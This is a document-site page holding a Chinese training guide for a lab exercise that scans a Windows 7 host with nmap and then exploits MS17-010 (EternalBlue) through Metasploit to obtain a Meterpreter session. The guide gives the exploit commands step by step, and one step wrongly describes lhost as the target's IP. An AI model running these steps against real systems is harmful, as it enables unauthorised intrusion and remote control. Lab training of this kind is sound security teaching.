版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
MS17_010漏洞验证实训指导1.登录Windows7,Administrators密码为“123456”2.运行cmd,输入“ipconfig”,查看ip地址可以看到服务器的ip是“192.168.15.126”,这时我们切换到kali3.用ping测试和服务 器的连通性,输入“ping192.168.15.126”发现连通正常,按Ctrl+C中断ping4.输入“nmap-O192.168.15.126-T4”来扫描服务器“其中参数-O为扫描操作系统信息,-T4为 4线程扫描,提升速度”445端口对应的服务是“microsoft-ds”,说明服务器开启了smb服 务,发现服务器操作系统版本可能为Windwos7|2008|8.1,判断服务器 可能存在“永恒之蓝漏洞”5.输入”msfconsole”启动msf对服务器进行渗透测试6.输入命令“searchms17_010”,查看关于永恒之蓝漏洞的模块7.输入“useauxiliary/scanner/smb/smb_ms17_010”调用扫描模块8.输入命令“setrhosts192.168.15.126”设置目标ip为服务器ip9.输入“run”命令进行测试出现绿色加号,回弹英文信息为“主机大概率会受到MS17-010漏洞影响”,说明主机大概率存在“永恒之蓝”漏洞”10.输入“useexploit/windows/smb/ms17_010_eternalblue”调用永恒之蓝利用模块11. 设置攻击载荷,选择后渗透模块。12.接着设置必要参数,包括rhosts(目标主机IP地址)、lhost(目标主机IP地址)13.输入命令“run”,开始渗透。看到屏幕出现“Meterpretersession1opend”并出现Meterpreter>命令提示符,表示渗透成功。1
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 村小奖惩制度
- 村环境卫生奖惩制度
- 杭州马拉松奖惩制度
- 2026年山西职业技术学院单招职业适应性考试题库及参考答案详解
- 2026紫金(厦门)工程设计有限公司校园招聘笔试备考题库及答案解析
- 2026广东梅州市蕉岭县招聘急需紧缺学科教师19人笔试备考题库及答案解析
- 成都市大邑县2026年上半年“蓉漂人才荟”公开招聘事业单位工作人员(30人)笔试备考试题及答案解析
- 2026湖南长沙雨花区枫树山大桥小学春季实习教师招聘笔试备考试题及答案解析
- 2026广东揭阳榕江实验室第二批全职工作人员招聘10人笔试备考题库及答案解析
- 2026年郑州职业技术学院单招综合素质考试题库与答案详解
- 樱与刀:日本民间故事集
- 中建路基挡土墙施工方案
- 项目一 新能源汽车维护作业前场地要求与准备
- GB/T 42756.1-2023卡及身份识别安全设备无触点接近式对象第1部分:物理特性
- 中国精神障碍分类与诊断标准第3版
- 融资服务协议合同
- Listen-to-This-2英语中级听力答案+原文整理版
- 茶叶加工项目可行性研究报告
- 水平定向钻穿越高速公路施工方案
- 应用写作写作四要素
- 设计思维与图形创意课件
评论
0/150
提交评论